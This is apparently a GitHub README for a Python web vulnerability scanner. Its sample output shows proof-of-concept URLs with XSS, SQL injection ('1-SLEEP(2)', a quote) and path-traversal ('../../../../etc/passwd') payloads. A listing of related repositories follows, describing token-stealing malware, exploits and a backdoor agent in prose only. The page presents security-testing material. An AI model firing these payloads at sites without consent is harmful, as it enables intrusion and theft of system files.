Vuln Scanner With Python

Overview

VulnScanner

Code

Version Language GitHub Repo stars


Features

Web Application Firewall (WAF) detection.

Cross Site Scripting (XSS) tests.

SQL injection time based test.

SQL injection error based test.

Local File Inclusion (LFI) test.

Cross Site Tracing (XST) test.


How To Run

git clone https://github.com/NullS0UL/VulnScanner

cd VulnScanner

python3 vulnscan.py http://example.com/page.php?cat=1

Example of Output

python3 vulnscan.py http://example.com/page.php?cat=1

[*] No WAF Detected.

Target: http://example.com/page.php?cat=1

Powered: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1

[!] Testing Cross Site Scripting (XSS)
[!] 10 Payloads.
[+] 9 Payloads were found.

[*] Payload found!
[!] Payload: <script>alert("inject")</script>
[!] POC: http://example.com/page.php?cat=<script>alert("inject")</script>

[*] Payload found!
[!] Payload: %3Cscript%3Ealert%28%22inject%22%29%3C%2Fscript%3E
[!] POC: http://example.com/page.php?cat=%3Cscript%3Ealert%28%22inject%22%29%3C%2Fscript%3E

[!] Testing SQLInjection
[*] Blind SQL injection time based found!
[!] Payload: 1-SLEEP(2)
[!] POC: http://example.com/page.php?cat=1-SLEEP(2)

[*] SQL Error found.
[!] Payload: '
[!] POC: http://example.com/page.php?cat='

[!] Testing Local File Inclussion (LFI)
[*] Payload found!
[!] Payload: ../../../../etc/passwd
[!] POC: http://example.com/page.php?cat=../../../../etc/passwd


[!] Testing Cross Site Tracing (XST)
[*] This site seems vulnerable to Cross Site Tracing (XST)!


Discaimer

Usage of the VulnScanner for attack targets without prior mutual consent is illegal. 
It is the end user's responsability to obey all applicable local, state, federal and international laws. 
Developer assume no liability and not responsible for any misuse or damage caused by this program.

Find me on

Facebook Telegram

Visit my Blog Site

  • Blogs
  • Owner
    < / N u l l S 0 U L >
    Use your brain , Make GOOGLE your friend 😘
    < / N u l l S 0 U L >
    Exploiting CVE-2021-42278 and CVE-2021-42287

    noPac Exploiting CVE-2021-42278 and CVE-2021-42287 原项目noPac在实现上可能有点问题,导致在本地没有打通,于是参考sam-the-admin项目进行修改。 使用 pip3 install -r requirements.txt # GetShel

    W4ter 2 Jun 23, 2022
    Caretaker 2 Jun 06, 2022
    Malware for Discord, designed to steal passwords, tokens, and inject discord folders for long-term use.

    Vital What is Vital? Vital is malware primarily used to collect and extract information from the Discord desktop client. While it has other features (

    HellSec 59 Dec 01, 2022
    Discord Token Stealer Malware Protection

    TokenGuard TokenGuard, protect your account, prevent token steal. Totally free and open source Discord Server: https://discord.gg/EmwfaGuBE8 Source Co

    10 Nov 23, 2022
    CVE-2022-22965 - CVE-2010-1622 redux

    CVE-2022-22965 - vulnerable app and PoC Trial & error $ docker rm -f rce; docker build -t rce:latest . && docker run -d -p 8080:8080 --name rce rce:la

    Duarte Duarte 20 Aug 25, 2022
    PasswordManager is a command-line program that helps you manage your secret files like passwords

    PasswordManager is a command-line program that helps you manage your secret files like passwords. It's very minimalistic and easy to use.

    Michael 3 Dec 30, 2021
    SpiderFoot automates OSINT collection so that you can focus on analysis.

    SpiderFoot is an open source intelligence (OSINT) automation tool. It integrates with just about every data source available and utilises a range of m

    Steve Micallef 9k Jan 08, 2023
    Description Basic Recon tool for beginners. Especially those who faces issue on how to recon or what all tools to use

    Description Basic Recon tool for beginners. Especially those who faces issue on how to recon or what all tools to use. Will try to add atleast 10 more tools currently use 7 sources to gather domains.

    Harinder Singh 7 Jan 03, 2022
    Operational information regarding the vulnerability in the Log4j logging library.

    Log4j Vulnerability (CVE-2021-44228) This repo contains operational information regarding the vulnerability in the Log4j logging library (CVE-2021-442

    Nationaal Cyber Security Centrum (NCSC-NL) 1.9k Dec 26, 2022
    IDA Pro Python plugin to analyze and annotate Linux kernel alternatives

    About This is an IDA Pro (Interactive Disassembler) plugin allowing to automatically analyze and annotate Linux kernel alternatives (content of .altin

    Open Source Security, Inc. 16 Oct 12, 2022
    TCP/UDP port scanner on python, usong scapy and multiprocessin

    Port Scanner TCP/UDP port scanner on python, usong scapy and multiprocessing. Usage python3 scanner.py [OPTIONS] IP_ADDRESS [{tcp|udp}[/[PORT|PORT-POR

    Egor Krokhin 1 Dec 05, 2021
    Tools Crack Fb Terbaru

    Tools Crack Fb Terbaru

    Jeeck 12 Jan 06, 2022
    Subdomain enumeration,Web scraping and finding usernames automation script written in python

    Subdomain enumeration,Web scraping and finding usernames automation script written in python

    Syam 12 Nov 22, 2022
    Bypass ReCaptcha: A Python script for dealing with recaptcha

    Bypass ReCaptcha Bypass ReCaptcha is a Python script for dealing with recaptcha.

    Marcos Camargo 1 Jan 11, 2022
    Volunteer & Campaign Management System

    Cleansweep Requirements A Linux (or Mac OS X) node with the following software installed. Ubuntu 14.04 is preferred. PostgreSQL 9.3 database server Py

    Aam Aadmi Party 39 May 24, 2022
    ♻️ Password Generator (PSG) 📚 This plugin is made for more familiarity with Python, but can also be used to create passwords

    About Tool This plugin is made for more familiarity with Python, but can also be used to create passwords.

    STgazing 2 Jul 23, 2022
    Auto Tor Ip Changer

    AutoTor Auto Tor Ip Changer for Linux! git clone https://github.com/Arest7/AutoTor cd AutoTor pip install -r requirements.txt python3 AutoTor.py follo

    Ken Ryuguji 3 Jan 23, 2022
    This program is a WiFi cracker, you can test many passwords for a desired wifi to find the wifi password!

    WiFi_Cracker About the Program: This program is a WiFi cracker! Just run code and select a desired wifi to start cracking 💣 Note: you can use this pa

    Sina.f 13 Dec 08, 2022
    Apache OFBiz rmi反序列化EXP(CVE-2021-26295)

    Apache OFBiz rmi反序列化EXP(CVE-2021-26295) 目前仅支持nc弹shell 将ysoserial.jar放置在同目录下,py3运行,根据提示输入漏洞url,你的vps地址和端口 第二次使用建议删除exp.ot 本工具仅用于安全测试,禁止未授权非法攻击站点,否则后果自负

    15 Nov 09, 2022
    Orthrus is a macOS agent that uses Apple's MDM to backdoor a device using a malicious profile.

    Orthrus is a macOS agent that uses Apple's MDM to backdoor a device using a malicious profile. It effectively runs its own MDM server and allows the operator to interface with it using Mythic.

    Mythic Agents 37 Dec 06, 2022